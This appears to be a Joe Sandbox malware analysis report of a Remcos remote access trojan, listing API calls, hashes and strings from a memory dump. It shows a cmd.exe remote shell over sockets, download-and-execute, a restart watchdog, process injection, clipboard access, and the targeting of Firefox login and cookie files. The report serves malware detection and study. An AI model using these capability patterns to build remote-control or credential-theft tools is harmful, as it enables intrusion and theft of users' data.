                                                                                Similarity
                                                                                • API ID: __crt_fast_encode_pointer
                                                                                • String ID:
                                                                                • API String ID: 3768137683-0
                                                                                • Opcode ID: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                                                • Instruction ID: bece27fcde9612dcc576c905fc453b1e46dde912844247b60aafe4dc7e802519
                                                                                • Opcode Fuzzy Hash: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                                                • Instruction Fuzzy Hash: D0118F37A007259FFB26DE18DD9095B73E5EB843E17168220ED18AB258DA32EC0196A1
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                                                                                • Instruction ID: 3af98ca860494c99acd04ebe2bb4cc6dc665ec8dea8eb108ba88c8789d347e54
                                                                                • Opcode Fuzzy Hash: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                                                                                • Instruction Fuzzy Hash: 9411E3B27201019FD7149B18C860BA6B766FF50710F5942AAE256CB3B2DB35EC91CA98
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __alldvrm
                                                                                • String ID:
                                                                                • API String ID: 65215352-0
                                                                                • Opcode ID: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                                                                                • Instruction ID: 3aa9a871bb282a4e2fa9f206226bba5a96c76ae51e783e445703a1682bb04715
                                                                                • Opcode Fuzzy Hash: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                                                                                • Instruction Fuzzy Hash: 51014CB2950308BFDB24EF64C902B6EBBECEB04328F10452FE445D7201C278AD40C75A
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                                • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                                                                • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                                • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                                                                                APIs
                                                                                • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Startup
                                                                                • String ID:
                                                                                • API String ID: 724789610-0
                                                                                • Opcode ID: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                                                • Instruction ID: 97c3e6bab4f4407137ad71e204409d8be70fba83985c90e8682379c152a4c00d
                                                                                • Opcode Fuzzy Hash: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                                                • Instruction Fuzzy Hash: 92D0123255C70C8EE620ABB4AD0F8A4775CC317616F0007BA6CB5836D3E6405B1DC2AB
                                                                                APIs
                                                                                • std::_Deallocate.LIBCONCRT ref: 00402E2B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Deallocatestd::_
                                                                                • String ID:
                                                                                • API String ID: 1323251999-0
                                                                                • Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                                • Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
                                                                                • Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                                • Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: recv
                                                                                • String ID:
                                                                                • API String ID: 1507349165-0
                                                                                • Opcode ID: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                                                • Instruction ID: c63eaffdb417a6470c671315a396a42075a312041b5b8b5670d44767818a4bbd
                                                                                • Opcode Fuzzy Hash: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                                                • Instruction Fuzzy Hash: 26B09279108202FFCA150B60CC0886ABEA6ABC8382B00882DB586411B0C736C851AB26
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: send
                                                                                • String ID:
                                                                                • API String ID: 2809346765-0
                                                                                • Opcode ID: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                                                • Instruction ID: 21703143275c54c82102de5c78eddca0fb0a16d203a0de67c7bd570fb3111ac2
                                                                                • Opcode Fuzzy Hash: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                                                • Instruction Fuzzy Hash: 87B09B75108301FFD6150760CC0486A7D6597C8341F00491C718741170C635C8515725
                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                                                • Instruction ID: 079a7b638a28e99b338f4493b6ebfa8105bff269478f0661155a893ef6bf0f7e
                                                                                • Opcode Fuzzy Hash: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                                                • Instruction Fuzzy Hash: 13B00872418382EBCF02DF90DD0492ABAB2BB88741F184C5CB2A14107187228428EB06
                                                                                APIs
                                                                                • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                                                                • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                                                                • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                                                  • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,34,004752F0,00000001), ref: 0041C37D
                                                                                  • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,34,004752F0,00000001), ref: 0041C3AD
                                                                                  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,34,004752F0,00000001), ref: 0041C402
                                                                                  • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,34,004752F0,00000001), ref: 0041C463
                                                                                  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,34,004752F0,00000001), ref: 0041C46A
                                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                                                                • GetLogicalDriveStringsA.KERNEL32 ref: 004082B3
                                                                                • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                                                                • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                                                  • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                                                  • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                  • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                  • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                • Sleep.KERNEL32(000007D0), ref: 00408733
                                                                                • StrToIntA.SHLWAPI(00000000), ref: 00408775
                                                                                  • Part of subcall function 0041CA73: SystemParametersInfoW.USER32 ref: 0041CB68
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                                • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                                                • API String ID: 1067849700-181434739
                                                                                • Opcode ID: 5d05b9e5912cfa102500c45496f1206bd97a638459f7d4c87d0a1996e3cafa4a
                                                                                • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                                                                                • Opcode Fuzzy Hash: 5d05b9e5912cfa102500c45496f1206bd97a638459f7d4c87d0a1996e3cafa4a
                                                                                • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                                                                                APIs
                                                                                • __Init_thread_footer.LIBCMT ref: 004056E6
                                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                • __Init_thread_footer.LIBCMT ref: 00405723
                                                                                • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                                                                • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                                                • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                                                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
                                                                                • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                                                • CloseHandle.KERNEL32 ref: 00405A23
                                                                                • CloseHandle.KERNEL32 ref: 00405A2B
                                                                                • CloseHandle.KERNEL32 ref: 00405A3D
                                                                                • CloseHandle.KERNEL32 ref: 00405A45
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                                                • API String ID: 2994406822-18413064
                                                                                • Opcode ID: c696ecc239ecaea7341ccd32d29cc90c40bd7cc6680ffd47ae91dd2587c992d5
                                                                                • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                                                                                • Opcode Fuzzy Hash: c696ecc239ecaea7341ccd32d29cc90c40bd7cc6680ffd47ae91dd2587c992d5
                                                                                • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                                                                                APIs
                                                                                • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                                                  • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                  • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                                                  • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4), ref: 004138E6
                                                                                • OpenMutexA.KERNEL32 ref: 00412181
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00412190
                                                                                • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                                                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                                • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$34
                                                                                • API String ID: 3018269243-2922096132
                                                                                • Opcode ID: 259918de9c6694897dbcd9ab4b329364c25cef91643e64702c63e99cee531876
                                                                                • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                                                                • Opcode Fuzzy Hash: 259918de9c6694897dbcd9ab4b329364c25cef91643e64702c63e99cee531876
                                                                                • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                                                                APIs
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                                                                • FindClose.KERNEL32(00000000), ref: 0040BC04
                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                                                                • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Find$CloseFile$FirstNext
                                                                                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                • API String ID: 1164774033-3681987949
                                                                                • Opcode ID: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                                                                                • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                                                                • Opcode Fuzzy Hash: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                                                                                • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                                                                APIs
                                                                                • OpenClipboard.USER32 ref: 004168FD
                                                                                • EmptyClipboard.USER32 ref: 0041690B
                                                                                • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                                                                • GlobalLock.KERNEL32 ref: 00416934
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                                                                • SetClipboardData.USER32 ref: 00416973
                                                                                • CloseClipboard.USER32 ref: 00416990
                                                                                • OpenClipboard.USER32 ref: 00416997
                                                                                • GetClipboardData.USER32 ref: 004169A7
                                                                                • GlobalLock.KERNEL32 ref: 004169B0
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                                • CloseClipboard.USER32 ref: 004169BF
                                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                • String ID: !D@
                                                                                • API String ID: 3520204547-604454484
                                                                                • Opcode ID: bf5a65ac99ffe61d9797845c90f3a5bbf17482b58dee495671916681c2117e8d
                                                                                • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                                                                • Opcode Fuzzy Hash: bf5a65ac99ffe61d9797845c90f3a5bbf17482b58dee495671916681c2117e8d
                                                                                • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,p54,?,00475338), ref: 0040F4C9
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4F4
                                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040F59E
                                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040F6A9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                                • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$p54$34
                                                                                • API String ID: 3756808967-1057179976
                                                                                • Opcode ID: 4c1678c020118b3bcda45d43f08c867fc8f180d6921f39041d9cab00d7c74641
                                                                                • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                                                                                • Opcode Fuzzy Hash: 4c1678c020118b3bcda45d43f08c867fc8f180d6921f39041d9cab00d7c74641
                                                                                • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                                                                APIs
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                                                                • FindClose.KERNEL32(00000000), ref: 0040BE04
                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                                                                • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                                                                • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Find$Close$File$FirstNext
                                                                                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                • API String ID: 3527384056-432212279
                                                                                • Opcode ID: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                                                                                • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                                                                • Opcode Fuzzy Hash: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                                                                                • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                                                                APIs
                                                                                • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                                                                • CloseHandle.KERNEL32(?), ref: 004134A0
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                                • String ID:
                                                                                • API String ID: 297527592-0
                                                                                • Opcode ID: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                                                                                • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                                                                                • Opcode Fuzzy Hash: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                                                                                • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0$1$2$3$4$5$6$7$VG
                                                                                • API String ID: 0-1861860590
                                                                                • Opcode ID: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                                                                                • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                                                                • Opcode Fuzzy Hash: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                                                                                • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,34,004752F0,00000001), ref: 0041C37D
                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,34,004752F0,00000001), ref: 0041C3AD
                                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,34,004752F0,00000001), ref: 0041C41F
                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,34,004752F0,00000001), ref: 0041C42C
                                                                                  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,34,004752F0,00000001), ref: 0041C402
